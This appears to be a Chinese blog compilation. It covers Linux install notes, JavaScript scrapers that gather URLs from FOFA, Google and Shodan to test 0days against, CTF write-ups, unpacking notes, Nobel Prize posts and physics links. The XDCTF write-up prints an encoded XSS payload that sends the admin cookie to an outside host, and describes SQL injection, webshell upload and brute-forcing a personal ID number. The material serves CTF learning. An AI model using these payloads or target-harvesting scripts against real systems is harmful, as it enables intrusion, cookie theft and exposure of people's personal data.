ubuntu12.04 折腾安装RTL8723BE无线网卡驱动

折腾了一上午,亲测无误,同时解决了rtl8723be不稳定总掉线的问题

首先是安装无线网卡驱动:

sudo apt-get install linux-headers-generic build-essential git

git clone http://github.com/lwfinger/rtlwifi_new
cd rtlwifi_new
make

sudo make install

 

ubuntu 14.04的rtl8723be网卡驱动不稳定解决方法:

sudo echo “options rtl8723be fwlps=0 swlps=0” > /etc/modprobe.d/rtl8723be.conf
sudo reboot

有使用上的问题,请留言

 

 

centos在线安装git的方法

在安装Git之前,需要先安装一些依赖包,安装依赖包之前可以先检查下是否已经安装。

shell命令如下:

# rpm -qa | grep zlib-devel

如果没有安装,我们先要安装这些依赖包:

# yum -y install zlib-devel openssl-devel perl cpio expat-devel gettext-devel
# yum install curl-devel
# yum install autoconf
# wget <a href=”http://git-core.googlecode.com/files/git-1.8.3.2.tar.gz”>http://git-core.googlecode.com/files/git-1.8.3.2.tar.gz</a>
# chmod +x git-1.8.3.2.tar.gz
# tar xzvf git-1.8.3.2.tar.gz
# cd git-1.8.3.2
# autoconf
# ./configure –with-curl=/opt/git
# make

# make install

到这里git已经安装才成功了,下面我们来验证一下:

# git –version
[[email protected] git-1.8.3.2]# git version
git version 1.8.3.2

利用搜索引擎批量抓取url

有的时候爆出0day,我们需要抓取大量的url进行测试,这个时候需要用到搜索引擎,常用的有:google,fofa,shodan
下面是整理的利用js对对不同搜索引擎进行批量抓取的代码:
fofa: (如何使用:StartReq(搜索语法,开始页码,结束页码) )

  1. StartReq('body=wooyun',1,10)
  2. function StartReq(q,startpage,endpage){
  3. for(var i=startpage;i<=endpage;i++){
  4. Req(i+"q="+encodeURIComponent(q)+"&qbase64="+btoa(q));
  5. }
  6. }
  7. function Connection(Sendtype,url,content,callback){
  8. if (window.XMLHttpRequest){
  9. var xmlhttp=new XMLHttpRequest();
  10. }
  11. else{
  12. var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  13. }
  14. xmlhttp.onreadystatechange=function(){
  15. if(xmlhttp.readyState==4&&xmlhttp.status==200)
  16. {
  17. callback(xmlhttp.responseText);
  18. }
  19. }
  20. xmlhttp.open(Sendtype,url,true);
  21. xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  22. xmlhttp.send(content);
  23. }
  24. function Req(searchString){
  25. var searchurl = "http://fofa.so/search/result?page="+searchString;
  26. Connection("GET",searchurl,"",function(callback){
  27. var result = $(callback);
  28. result.find('div.col-lg-4 a').each(function(i,o){
  29. var o = $(o);
  30. if(o.attr('target')=="_blank"){
  31. if(o.attr('href').indexOf('/search/checkapp?all=true&host=')){
  32. console.log(o.attr('href'));
  33. }
  34. }
  35. })
  36. })
  37. }

google:

  1. StartReq("site:xss1.com",1,1);
  2. var tmp = [];
  3. var HerfRegExp = /http:\/\/\w.*\/|https:\/\/\w.*\//;
  4. document.body.appendChild(document.createElement('script')).src='//code.jquery.com/jquery-1.9.1.min.js';
  5. function StartReq(q,startpage,endpage){
  6. for(var i=startpage;i<=endpage;i++){
  7. if(i==1){
  8. Req("q="+encodeURIComponent(q)+"&start=100&num=100&newwindow="+i);
  9. }
  10. else{
  11. Req("q="+encodeURIComponent(q)+"&start="+(i*100)+"&num=100&newwindow="+i);
  12. }
  13. }
  14. }
  15. function Connection(Sendtype,url,content,callback){
  16. if (window.XMLHttpRequest){
  17. var xmlhttp=new XMLHttpRequest();
  18. }
  19. else{
  20. var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  21. }
  22. xmlhttp.onreadystatechange=function(){
  23. if(xmlhttp.readyState==4&&xmlhttp.status==200)
  24. {
  25. callback(xmlhttp.responseText);
  26. }
  27. }
  28. xmlhttp.open(Sendtype,url,true);
  29. xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  30. xmlhttp.send(content);
  31. }
  32. function Req(searchString){
  33. var searchurl = "https://www.google.com.hk/search?"+searchString;
  34. Connection("GET",searchurl,"",function(callback){
  35. var result = $(callback);
  36. result.find('div.rc h3.r a').each(function(i,o){
  37. var o = $(o);
  38. tmp.push(String(HerfRegExp.exec(o.attr('href'))));
  39. })
  40. })
  41. }

最后的结果不会输出,会存入到tmp 数组,方便去重,如果需要输出可以自行加个循环tmp 把值打印出来
如何使用:StartReq(搜索语法,开始页码,结束页码)

shodan:

  1. var url = "http://www.shodanhq.com/search?q=关键字&page=";
  2. for(var i=1;i<101;i++){
  3. var request = null;
  4. if (window.ActiveXObject) {
  5. request = new ActiveXObject("Microsoft.XMLHTTP");
  6. }else {
  7. request = new XMLHttpRequest();
  8. }
  9. request.open("GET",url+i, false);
  10. request.setRequestHeader('If-Modified-Since', '0');
  11. request.send(null);
  12. var str = request.responseText;
  13. str = str.replace(/\r/g,"");
  14. str = str.replace(/\n/g,"");
  15. var urls = [];
  16. str.replace(/\<div class=\'ip\'>.*?<a href=\".*?\">(.*?)<\/a>.*?<\/div>/ig, function(a,b) {
  17. urls.push(b);
  18. });
  19. console.info(urls.join('\n'));
  20. }

新版的shodan:

  1. var url = "https://www.shodan.io/search?query=port%3A27017&page=";
  2. for(var i=1;i<101;i++){
  3. var request = null;
  4. if (window.ActiveXObject) {
  5. request = new ActiveXObject("Microsoft.XMLHTTP");
  6. }else {
  7. request = new XMLHttpRequest();
  8. }
  9. request.open("GET",url+i, false);
  10. request.setRequestHeader('If-Modified-Since', '0');
  11. request.send(null);
  12. var str = request.responseText;
  13. str = str.replace(/\r/g,"");
  14. str = str.replace(/\n/g,"");
  15. var urls = [];
  16. str.replace(/\<div class=\"ip\">.*?<a href=\".*?\">(.*?)<\/a>.*?<\/div>/ig, function(a,b) {
  17. urls.push(b);
  18. });
  19. console.info(urls.join('\n'));
  20. }

以上内容整理自:http://zone.wooyun.org/content/16840

CSCAMP 2014CTF|writeup web-7amama Book

We can see the description first:

Description:

7amamaBook is a social media website where people can sign up and share with each other. It has a bug bounty program and you found a bug and reported it but they refuse to pay you so you want to give them a payback by hacking it.

Then I open the webpage(http://178.63.58.69:8082/bounty.php), I find the web manager post something like this:

We don’t pay for CSRF vulnerability.

OK, there must have a CSRF vulnerability on this website. Let’s hack it!
I register a account test233 first. Then user this account to log in this website.
When I check the view-source  of the homepage I find a link: http://178.63.58.69:8082/settings.php
On this page there is nothing to defend the CSRF attack, so we can change anyone’s password as we can.
I also find another very important link: http://178.63.58.69:8082/profile.php?user=7atata
Sorry, you can’t view this post.
This post’s privacy is set to “Only me”

This remind us to update the password of the user 7atata.

And then we get to that page, we find the flag is over there

大神的脱壳笔记【转】

转自乐乐大神的空间:http://user.qzone.qq.com/179519167/blog/1264251355

一.脱壳基础知识要点
1.PUSHAD :(压栈) 代表程序的入口点
2.POPAD  :(出栈) 代表程序的出口点,与PUSHAD想对应.看到这个,就说明快到OEP了.
3.OEP:程序的入口点,软件加壳就是隐藏OEP.而我们脱壳就是为了找OEP.

二.脱壳调试过程中辨认快到OEP的简单方法
下面二个条件是快到OEP的共同现象:
若出现下面情况时,说明OEP就要到了:
1. OD跟踪过程中如果发现:
popad
popfd

popad
2.同时,紧接着,有retn ,jmp等其它跳转指令,发生跨段跳跃时.
说明OEP马上到了.

三.脱壳必需牢记的要领
1.单步往前走,不要让程序向上走,遇到向上跳时,在下一句按F4,运行到所选.
2.刚载入程序,在附近就call时,我们按F7跟进去.
3.若跟踪时,运行某个call程序就运行时,这个call也用F7进入.
4.在跟踪时,出现比如 jmp XXXXXX 或者 JE XXXXXX 或者有RETN同时发生大跨段跳转时,说明很快就到OEP了.

四.常用脱壳方法总结
——————
方法一:单步跟踪法
——————
介绍:这是最通用的方法,对于未知壳,基本都用这种方法,这种方法过程比较麻烦,要一步一步的跟踪分析,要有一定的耐心.
1.用OD载入,选”不分析代码”
2.单步向下跟踪按F8,实现向下的跳.不让程序往回跳.
3.遇到程序往回跳的(包括循环),我们在下一句代码处按F4(或者右健单击代码,选择断点——>运行到所选)
4.如果刚载入程序,在附近就有一个CALL的,我们就F7跟进去,不然程序很容易运行.
5.在跟踪的时候,如果运行到某个CALL程序就运行的,就在这个CALL中F7进入.
6.一般遇到很大的跳转(跨段跳),比如 jmp XXXXXX 或 JE XXXXXX 或有RETN的一般很快就会到程序的OEP。

—————–
方法二:ESP定律法
—————–
介绍: 这种方法可以脱大部的压缩壳和少数加密壳,操作起来比较简单,脱壳速度也相对比较快.
1.开始就点F8向下走,注意观察OD右上角的寄存器中ESP有没突现(变成红色)
2.在命令行下:dd XXXXXXXX(指在当前代码中的ESP地址,或者hrXXXXXXXX),按回车!
3.选中下断的地址,断点—>硬件访问—>WORD断点。
4.按一下F9运行程序,直接来到了跳转处,按下F8向下走,就到达程序OEP。
—————–
方法三:内存镜像法
—————–
介绍:也是一种比较好用的脱壳方法,大部分的压缩壳和加密壳用内存镜像法能快速脱掉.非常实用.
1.用OD打开,设置选项——调试选项——异常,忽略所有异常(也就是把里面的忽略全部√上),然后CTRL+F2重载下程序!
2.按ALT+M,打开内存镜象,找到程序的第一个.rsrc.按F2下断点,然后按SHIFT+F9运行到断点.
3.接着再按ALT+M,打开内存镜象,找到程序的第一个.rsrc.上面的.CODE,按F2下断点!然后按SHIFT+F9,直接到达程序OEP!
—————-
方法四:一步到OEP
—————-
介绍:这是一种巧方法,脱壳速度最快,前提是要知道这个壳的特征,利用这种壳的共性快速找到程序的OEP.这种方法只用于少数壳.
1.开始按Ctrl+F,输入:popad,然后按下F2下断,按F9运行到此处.

2.很快来到大跳转,按F8向下走,来到OEP.

———————-
方法五:最后一次异常法:
———————-
介绍:这种方法一般用于加密壳,这是脱加密壳的一种通用方法.
第一步:用OD打开程序,点击选项——调试选项——异常,把里面的√全部去掉!CTRL+F2重载下程序.
第二步:接着我们按SHIFT+F9,直到程序运行,记下从开始按SHIFT+F9到程序运行的次数n.
第三步:重载程序,再按SHIFT+F9,这次按的次数为上次让程序运行时的次数的n-1次.
第四步:此时观察OD的右下角有一个”SE 句柄”,这时我们按CTRL+G,输入SE 句柄前的地址!来到这个地址.
第五步:在这里,按F2下断点!然后按SHIFT+F9来到断点处!
第六步:这时候我们已经跳过了所有异常,然后去掉断点,按F8慢慢向下跟踪很快就到达OEP了.

【压缩壳】(可以用ESP定律法进行脱壳)
ASPACK 1.08
Aspack 2.11
Dxpack 0.86
PC Shrinker 0.71
PECompact 1.84
Pepack 1.0
UPX 1.08

【手动脱FSG2.0壳】
用OD载入后前三行一样
单步到第三句
00400154 >  8725 2C794100   xchg dword ptr ds:[41792C],esp
0040015A    61              popad
0040015B    94              xchg eax,esp   —-单步到这里注
0040015C    55              push ebp       数值
0040015D    A4              movs byte ptr es:[edi],byte ptr ds:[esi]
0040015E    B6 80           mov dh,80
再右下角的数值重选四个
右键,在数据窗口(转存)中跟随
再在左面跟随到的地址上点右键
断点、硬件执行
F9
分析、从模块中删除分析

史上最水的Nobel Prize in Physics

上面的截图来自Nobel Prize的官网,大家一直可能觉得最水的Nobel Prize应该是路易·维克多·德布罗意的电子的波动性,认为德布罗意就提出了一个物质波公式:λ=h/p,然后啥实验过程结果都没有,但是de Broglie提出的概念是超前的并且对于物理学进展以及人类对于自然的认知是具有划时代的意义的。

我们再来看1912年的Nobel Prize in Physics,我们可以看到图中的哥们受到表彰是因为他发明了能够自动调节的具有灯塔功能的浮标这么一个玩意儿。然后这哥们的研究领域是:applied mechanics,mechanics

你可能在想:卧槽,这是个什么玩意,你不是在逗我吧!为什么把奖颁给这哥们?不会是他爸在诺奖委员会吧?

我们回顾下历史,1912年到底发生了什么事情呢?

对了,RMS Titanic 是1912年4月份沉的,11月份这哥们就因为浮标灯塔而获奖,你觉得这是巧合还是巧合呢?

你可能想:我去,这样获奖也太简单了吧?下次等宇宙飞船研制出来了,我给他打下来,然后发明一个具有在太空漂浮功能的灯塔是不是我也能获得诺奖了?

小伙子,还用那么麻烦么,到中国来搞分裂然后再流亡国外或者去美国当总统吧 🙂

The Nobel Prize in Physics 2014

The Nobel Prize in Physics 2014 was awarded jointly to Isamu Akasaki, Hiroshi Amano and Shuji Nakamura “for the invention of efficient blue light-emitting diodes which has enabled bright and energy-saving white light sources”.

上面这段文字摘自Nobel Prize 官网。

今年的物理学奖应该算是对于人们的生活以及工业有着重要的意义,首先说下上面三位大牛获奖是因为他们研制了蓝光LED。为什么说蓝光LED的成功研制意义重大呢?

先简单了解下LED:LED全称是发光二极管,当LED两级达到击穿电压时导通并对外放出光子,它相对与传统的白炽灯,日光灯材料更加环保,效能更高。现在的节能灯和显示屏几乎都是由LED构成。

但是LED产生的光都是单色光,而白光是复色光,由多种单色光混合而成,在此之前,红光和绿光的LED已经早就研究出来了,但是蓝光LED一直没有研究出来。众所周知,红,蓝,绿三原色光能够构成白光,所以蓝光LED的发明对于图像显示,照明有着重大的意义。

 

简单的介绍下三人的研究:

赤崎勇、天野浩、中村修二在上世纪90年代早期,从半导体中发现蓝色光束。当时,赤崎勇和天野浩在日本名古屋大学工作,而中村修二当时则在位于四国岛上的德岛市内一家名为“日亚化学”(Nichia Chemicals)的小公司工作。蓝光LED的研发是日本产研结合的成果。在GaN(氮化镓,一种发光材料) LED的研究阶段,赤崎勇领导的研究小组取得了出色的成果,在之后的实用化及高亮度化阶段,中村修二则发挥了重要作用。(这里要注明一下,从原理上来说,好几种材料都能实现蓝色发光功能。其中,氮化镓是最受人冷落的。但恰恰只因“其他人没有采用”,中村便决定了他的选择。)当他们通过半导体产生出蓝色光源时,照明技术革命的大门打开了。白炽灯照亮了整个20世纪,而21世纪将是LED灯的时代。

参考链接:

http://www.nobelprize.org/nobel_prizes/physics/laureates/2014/

http://zh.wikipedia.org/wiki/%E7%99%BC%E5%85%89%E4%BA%8C%E6%A5%B5%E7%AE%A1

 

XDCTF-writeup

XDCTF2014 Write-ups by 我们是来打酱油的

Member: test233 test234

本来组了一个队,但是我要复习英语就没打算做题,但是一天过后发现队友根本没有做题,我就醉了,难道题目很难么。。简单看了下题不是很难,试着做了几道web的题,然后发现狮子骑士也是一个人在做题,果断和逆向大牛重新组了一个队“我们是来打酱油的”,最后做了挺多题,可惜做的时间比较迟,奖励分都没有了,其实看了下和9、10名的队做的题是一样的,别人做的早有奖励分,不然可以进线下赛。骑士牛还是非常给力的,搞定了好几道逆向题,下面是这次比赛的writeup:

Web

WEB20

Web50

Web70

Web100

WEB200

Web150

Web180

WEB250

WEB270

Crack

Crack100

Crack120

Crack150

Crack300

Crack180

 

 

 

 

Web20

打开题目连接,提示是Happy Easter, 网页中有张图片是个复活节的彩蛋图,抓包看了下网页是用PHP写的,上网搜了下PHP彩蛋,于是按照说明,访问下面的URL:

http://game1.xdctf.com:8081/H86Ki4NnCSVv/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

在返回的页面里面找到了flag信息:

Flag: flag-WhatisPhp-mtzeXAtcKA53

 

 

 

Web50

下载XSS编码神器,解压后发现是个chrome插件文件,把后缀改成RAR再解压:

挨个打开,在manifest.json里发现:

dGhlIGZvbGxvd2luZyBrZXkgaXMgbm90IHRoZSByZWFseSBrZXksIHlvdSBjYW4gZmluZCBpbiB0aGUgb3RoZXIgZmlsZSE=

base64解码后得到:

the following key is not the realy key, you can find in the other file!

可见key不是这个(出题的基友单词写错了),查看其他的文件,最后发现fuck.jpg中有一段数字:

解码后:

得到key:[email protected]

 

 

Web70

用jother编码xss poc代码成功绕过,发送邮件得到key:

XsSXD$3([email protected]@n

 

 

Web100

查看网页源代码,发现有张隐藏的图片,打开看是张二维码,过段用手机扫一扫,结果打开是个空白,把解码的东西发到电脑上发现是个网址加上 RGB,打开链接是微信公众号发布的一个图文消息:

http://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=200689499&idx=2&sn=76a5cb177facf0ca76dfcc2db7e135cf#rd

发现是一种代码隐藏在图片中的新技术,根据提示关注微信号回复得到网址(这尼玛还有广告):

http://www.secureworks.com/cyber-threat-intelligence/threats/malware-analysis-of-the-lurk-downloader/

根据文中的方法,把RGB中B的bytes提取出来,然后8位一组进行重组,最后得到KEY:

[email protected]

Web200

题目提示是一个python写的网站,需要尝试获得flag,并提示看help。首先访问/help,可以得到readme的提示,访问/read,可以获取网站的py代码,但是一次只有两行。尝试了几次,由于代码有重复行,没想到有好的自动化方法,于是就手动收集吧 0.0

最终经过不懈努力和拼接,收集到了网站的python代码完整版(貌似是对的……):

然后看到博客里面的提示:

http://www.leavesongs.com/PENETRATION/web-py-runcode-tip.html

so…直接访问getflag,传参数unabletoread为le4f.net,抓包即可以在HTTP里面获取到flag:

XDCTF{X1di4nUn1Vers1tySecT3AM}

 

Web150

本地搭了个PHP环境,然后进行抓包,看到有stmp的密码,就是key:

[email protected]

Web180

首先下载了整站源码,在网站根目录下发现about.asp的大马,发现一个qq:2725629821,这个应该是入侵者的qq,根据题目要求需要找到昵称和身份证号码,于是查找一下这个qq号,

根据上面的信息得到了昵称:gh0st2014

和身份证前几位:61011619850507

在他空间中找到了这张图片:

于是还原出身份证号码:610116198505073895提交了发现不对,应该是地区对应的号码有问题,用burp进行爆破,最后发现正确的是:

gh0st2014

610121198505073895

登陆后获得key:

key:[email protected][email protected]@r

 

Web250

登陆后发现是个留言板,需要插入xss代码,从管理的cookie里获取flag,测试了多组,发现过滤了:”  ‘  =   (  )    \   document

但是只要 插入[string]都会变成<string>

于是利用<svg><script>html编码后的code<script>进行绕过:

插入如下代码:

[svg][script]&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#61;&#34;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#98;&#98;&#115;&#46;&#100;&#117;&#116;&#115;&#101;&#99;&#46;&#99;&#110;&#47;&#49;&#46;&#112;&#104;&#112;&#63;&#99;&#61;&#34;&#43;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#59;[/script]

其中远程1.php进行接受:(是不是人工审核的,晚上11点提交的,第二天早上才收到cookie)

xdctf_xss_flag=flag-twEizeCWW6ChsXpEIbZxtx7D

Web270

http://ph.xdctf.com:8082/ 目标网站看了下,啥也没有,所以从同服网站下手

http://hlecgsp1.xdctf.com:8082/

打开发现是个phpok 4.x的网站,果断到wooyun上去找poc

试了几个直接getshell的都不好用

发现有个sql注入:

http://hlecgsp1.xdctf.com:8082/api.php?c=api&f=phpok&id=_project&param[pid]=1

表比较多,直接放到sqlmap中跑,得到账号密码,密码MD5破解后登陆网站后台,在模板管理那可以上传shell

利用大马搜索功能:搜索flag:

打卡文件后找到1、2、4三题的flag:

flag-3rdf1agis0nth155erver

flag-letmeshowyoushell

flag-ICanReadAllFileOnTheServer

第三个flag看样子应该在ph这个网站目录下,但是shell无法执行命令,提权也就不行了,应该是要绕过网站目录限制,在网上搜索了各种poc,发现了/fd大神写的神器(http://www.jinglingshu.org/?p=4989)成功读到了ph网站目录:

得到第三个flag:flag-whyflagisastupidfilename

 

 

 

 

 

 

 

 

 

 

 

Crack100

这道题目给了一个加密程序和加密之后的文件,逆加密之前的文件,好吧……看了看是.NET程序,直接上Reflector,可是貌似加了混淆,于是再用de4dot去混淆,就可以看到用于加密的C#代码了:

然后依旧是进行加密算法的逆向和分析,首先通过加密后文件,逆推smethod_3之前结果(这里自己脑残的地方是没用发现牵扯到编码问题,加密后文件是UTF-8的,如果直接扔到十六进制分析工具得到的ASCII码没办法去逆,需要先保存成ASCII码编码文件,再去逆……)编码后:

A2A4A6A199AD9EA8A1A2A4A39BA89FA79FA498AF9EA9A5A294AE9CA6A0A 294AF96ACA3A1A3A4A3A3A1A299AA98AA96ADA2A196AF9BA79AACA0A69D AA9EA496B09CA99FA5A1A49EA6A0A4A0A3A2A1A1A29EA5

于是,后来发现hint,flag是44位,果断分析0x2c那个分支,核心算法在smethod_5,和之前ALICTF的逆向200差不多,也是2位对应1位,高4bit和低4bit分别还原,果断去暴力还原:

得到中间结果:cplg1r7f3~xq-%!>[email protected])<0^&key#oXDSEC2014

这个是41位,需要对最后的9位再逆smethod_1和smethod_0,分别是

base64加密和一个诡异的异或处理(没仔细看,依旧一位一位暴力了……),最后得到最终的44位flag:

cplg1r7f3~xq-%!>[email protected])<0^&key#o==4102cesdx=

 

Crack120

这道题目下载时有一个加密之后的data文件和一个脚本。后来看到一篇文章,想到可能是pyc文件:http://iamsk.info/2013/07/24/a-python-2.7-pyc-decompiler/

果断在本机试了一下……

接下来就是慢慢分析算法了,核心代码是:

大概就是将加密前的文件按字节流进行处理,从低位到高位,先取当前bit为type,做输出密文的最高位,然后找到不同的时候记录是第几个字符找到的不同(‘0’和‘1’),与type组合输出到密文,type做01互换,然后再继续往下找,以此类推……

默默地写了个程序去逆这个算法,就是根据之前的算法逆推,核心代码如下:

最后得到加密之前的文件,有JFIF文件头,果断改后缀,发现flag:

Key: xidianZ0L4 weLc0me y0u

 

Crack150

将下载下来的apk反编译,打开后找了一圈没找到key的代码,看到assets文件夹下有个k.jpg,这个应该是key所在的文件夹了,查看了下图片信息,发现结尾有个dex头:

 

 

应该是个dex文件,导出后发现key就是key的16位md5加密后的字符串(这句话怎么听起来这么别扭)

Crack300

查看了代码后发现是RC4解密,没有密钥只能写程序爆破,爆破得出的解密密钥为:[email protected]!F,解密出的明文为:XDCTF{omgwtfjusthappenedtherethen}

 

Crack180

打开提供的crypt.txt,数字加上一堆大写的AABB,应该是培根加密了:

用python写了个解密程序:

import re v= [‘AAAAA’,’AAAAB’,’AAABA’,’AAABB’,’AABAA’,’AABAB’,’AABBA’,’AABBB’, ‘ABAAA’,’ABAAA’,’ABAAB’,’ABABA’,’ABABB’,’ABBAA’,’ABBAB’,’ABBBA’, ‘ABBBB’,’BAAAA’,’BAAAB’,’BAABA’,’BAABB’,’BAABB’,’BABAA’,’BABAB’, ‘BABBA’,’BABBB’] f = open(‘jiemi.txt’,’r’) a = f.readline() for i in range(0,26): a = re.sub(v[i],chr(i+97),a) f1 = open(‘result.txt’,’wb’) print a f1.write(a) f1.close()

然后我们进行测试,看下传输的过程,用nc连接game1.xdctf.com   端口,50008,注册账号test233,得到密码:1aecb99868955b4a4e83a68a2842c7ac,然后给Le4f转账,出现同crypt.txt中的字符串:

595270AABAA5853AAAAB133AABAA07AAAABAAABBAAAAB5AAABB7AABAB 827AAABB0AAABBAABAB6AAAAA910AAABBAABAA23289280801AABABAAA AAAABAAAABABAAABBAAABB4078AABAA56AABAB1AAAAAAABAAAAABAAAA AB99868955AAAAB4AAAAA4AABAA83AAAAA68AAAAA2842AAABA7AAAAAA AABA53AAAAB5AABABAABABAAABAAAAAA9281AABAAAAABA958AAAABAAB AB38AABAB1AAAAA89AAAABAAABB12AAABB57AAABB4AAABA01AAAAB242 927AAAABAABAA0643AABAB06AABABAAAABAABAA29AAAAB10AAAAAAABAA

同样用程序进行处理,然后我们进行比较发现:

第一部分和最后一部分是公共的,第二段是密码,所以我们得到Ph账户密码是:

b8c2b5c881f2b7f58a096a367a32be33,根据题目提示进行操作:

成功得到key:

xdctf{d4d5906bb2f30b3bbbc1d915e6ba0f7321}

 

国外物理网站汇总

 

 

 

 

 

 

 

 

德国物理网站 http://physnet.uni-oldenburg.de/PhysNet/physnet.html
挪威物理网站 http://physicsweb.org/
荷兰物理网站 http://www.elsevier.nl/homepage/sak/physics/
美国物理协会网站 http://www.aps.org/
美国物理研究所网站 http://www.aip.org/
欧洲物理协会网站 http://www.eps.org/
科学论坛网站 http://www.link.springer.de/forum.htm
美国在线文档网站 http://arxiv.org/
等离子体物理实验室网站 http://plasma-gate.weizmann.ac.il/
华盛顿大学物理教育研究中心 http://www.phys.washington.edu/groups/peg/
美国 K12 教育(类似与我国的九年制义务教育)站点 http://k12.oit.umass.edu/
加利略工程—–教学思想与教学资料改革数据库站点 http://galileo.harvard.edu/
华盛顿大学教育资源中心 http://www.univie.ac.at/cognition/
物理动画 http://faculty.rmwc.edu/tmichalik/physmov.htm
英国的高等教育和研究结构的站点 http://www.hero.ac.uk/
欧洲物理协会网络服务器主页 http://www.nikhef.nl/pub/eps/epsa.html
原子核科学ABC网站 http://www.lbl.gov/abc/
欧洲光学协会网站 http://www.europeanopticalsociety.org/
欧洲核物理协会网站 http://www.euronuclear.org/
美国核物理协会网站 http://www.ans.org/
美国物理中心网站 http://www.acp.org/
欧洲粒子物理研究所网站 http://user.web.cern.ch/user/cern.html
欧洲粒子物理研究所在线图书馆网站网站 http://weblib.cern.ch/
德国奥德堡大学物理系的网站 http://www.physik.uni-oldenburg.de/services.html
阿姆斯特丹大学物理系网站http://www.science.uva.nl/research/scm/index.html#theses
物理参考数据网网站 http://physics.nist.gov/PhysRefData/
雅虎物理网网站 http://dir.yahoo.com/Science/physics/
物理文献搜索引擎Ingenta网站 http://www.ingenta.com/
物理进入点网站 http://www.iuk-initiative.org/doc/physik.html
荷兰的原子核物理网站 http://www.nikhef.nl/
国际数学物理协会网站 http://www.iamp.org/
美国物理教师协会网站 http://www.aapt.org/
哈佛大学物理教学网站 http://mazur-www.harvard.edu/education/educationmenu.phtml
加里福尼亚大学伯克利学院物理演示网站 http://www.mip.berkeley.edu/physics/physics.html
北加里佛尼亚大学物理演示实验网站 http://demoroom.physics.ncsu.edu/
曼彻斯特大学物理教育网站 http://umperg.physics.umass.edu/
美国物理教育资源协会网站 http://www.wfu.edu/physics/pira/PIRAHome3.html
乔治城大学物理教育资源 http://www.physics.georgetown.edu/education.htm
美国安大略州物理教师协会网站http://www.physics.uoguelph.ca/OAPT/index.html
物理教学演示和授课软件网站 http://www.universityphysics.com/
虚拟物理实验网站 http://jersey.uoregon.edu/vlab/
澳大利亚物理协会网站 http://www.aip.org.au/
加拿大物理协会网站 http://www.cap.ca/
San Diego State大学教学与科学教育研究中心 http://public.sdsu.edu/CRMSE/
Tufts大学教学与科学教育研究中心 http://ase.tufts.edu/csmt/
荷兰物理演示数据库网站 http://www.tn.tudelft.nl/cdd/
国际物理学生协会网站 http://iaphys.org/
国际理论物理协会网站 http://www.ictp.trieste.it/
国际光学工程协会网站 http://www.spie.org/
国际医学物理工程协会网站 http://www.iupesm.org/
国际应用生物物理学协会网站 http://www.iupab.org/welcome.html
国际结晶学协会网站 http://www.iucr.ac.uk/welcome.html
国际材料协会网站 http://www.mrs.org/
国际光谱学协会网站 http://www.s-a-s.org/
国际物理协会网站 http://www.iupap.org/
国际液体晶体协会网站 http://www.ilcsoc.org/
世界各国大学站点数据库 http://geowww.uibk.ac.at/univ/
诺贝尔基金委员会网站 http://www.nobel.se/
物理实验室网站 http://physics.nist.gov/
休斯顿大学的物理连接 http://info.lib.uh.edu/indexes/physics.htm
物理学中经常提问的问题网站 http://math.ucr.edu/home/baez/physics
看的见的物理网站 http://library.thinkquest.org/10170/
英国的教学网络系统 http://dbweb.liv.ac.uk/ltsnpsc/
瑞典物理评论期刊网站 http://www.physica.org/
今日物理期刊网站 http://www.physicstoday.org/
美国物理期刊网站 http://ojps.aip.org/ajp
物理教师期刊网站 http://ojps.aip.org/ajp
物理世界杂志网站 http://www.physicsweb.org/toc
德国物理期刊主页 http://w3.rz-berlin.mpg.de/bib/inhalt.html
美国物理协会期刊网站 http://publish.aps.org/
物理通讯期刊的网站 http://www.elsevier.nl/
物理学会(IOP)的出版物 http://www.iop.org/
物理评论在线文档网站 http://prola.aps.org/
现代物理评论网站 http://www.rmp.aps.org/
年度评论期刊网站 http://www.annualreviews.org/
日本应用物理期刊网站 http://jjap.ipap.jp/
荷兰期刊网站 http://www.wkap.nl/
综合期刊网站 http://www.gbhap.com/physical.htm
科学杂志网站 http://www.sciencemag.org/
自然杂志网站 http://www.nature.com/

物理新闻 http://www.aip.org/physnews/index.html
该网站提供最新新闻、图片、前景预测及联邦物理基金会信息。

全球物理服务机构和服务项目 http://www.physics.mcgill.ca/phy … sics_services2.html
该网站提供物理资源查询服务,包括可查询的资料库、买卖公告栏等。

物理参考资料 http://physics.nist.gov/PhysRefData/contents.html
该网站介绍由美国国家工业技术标准局提供的有关信息。

互联网物理教育经验(IPPEX) http://ippex.pppl.gov/ippex
该网站提供有关电、磁、物质和能量聚变的交互式主页。

2000年物理学 http://www.colorado.edu/physics/2000
该网站提供物理和高科技设备的可视化交互式学习场所。

微引力研究计划 http://microgravity.msfc.nasa.gov
该网站介绍微引力研究计划,该计划研究引力和太空环境对生物、化学和物理过程的影响。

数学与分子(MathMol) http://www.nyu.edu/pages/mathmol
该网站讨论分子造型的话题。

粒子物理 http://www.eagle.co.uk/ppj/home.html
该网站提供有关高能粒子物理研究的实验和理论,包括宇宙学领域研究的再线综述。

粒子冒险 http://pdg/lbl.gov/cpep/adventure.html
该网站提供物理和高科技设备的可视化交互式学习服务。

粒子表面资源 http://chaos.fullerton.edu/mhslinks.html

耶鲁大学理论核物理信息 http://nst4.physics.yale.edu
该网站提供研究生班课程表和有关核物理信息,并链接到实验核物理研究小组。

高能物理信息网 http://www.hep.net
该网站链接到互联网上各个高能物理研究的信息资源。

光学信息索引 http://www.spie.org/gateway.html

光谱学、辐射度学和光子学信息中心
http://www.gate.net/~quanta
该网站提供完备的光谱学资源。

光学辞典 http://Dictionary.laurin.com
该网站提供完备的光学工业资源以及查询服务。

光学 http://www.laurin.com
该网站介绍光学研究信息,内容包括光学、激光、光纤、成像和光学计算等光学研究的各个方面。

莫雷物质光谱主页 http://tswww.cc.emory.edu/~kmurrary/mslist.html
该网站提供物质光谱信息。

网上光学信息资源 http://www.tateweb.com

紫外光亮可调真空管 http://www.strauss.lanl.gov
该网站讨论最大熵值、贝亚思可能性理论和其他研究课题。

双稳定光学设备专利 http://www.covesoft.com/weinberger

光学研究组织 http://www.optics.org
该网站是光子学研究信息资源中心。

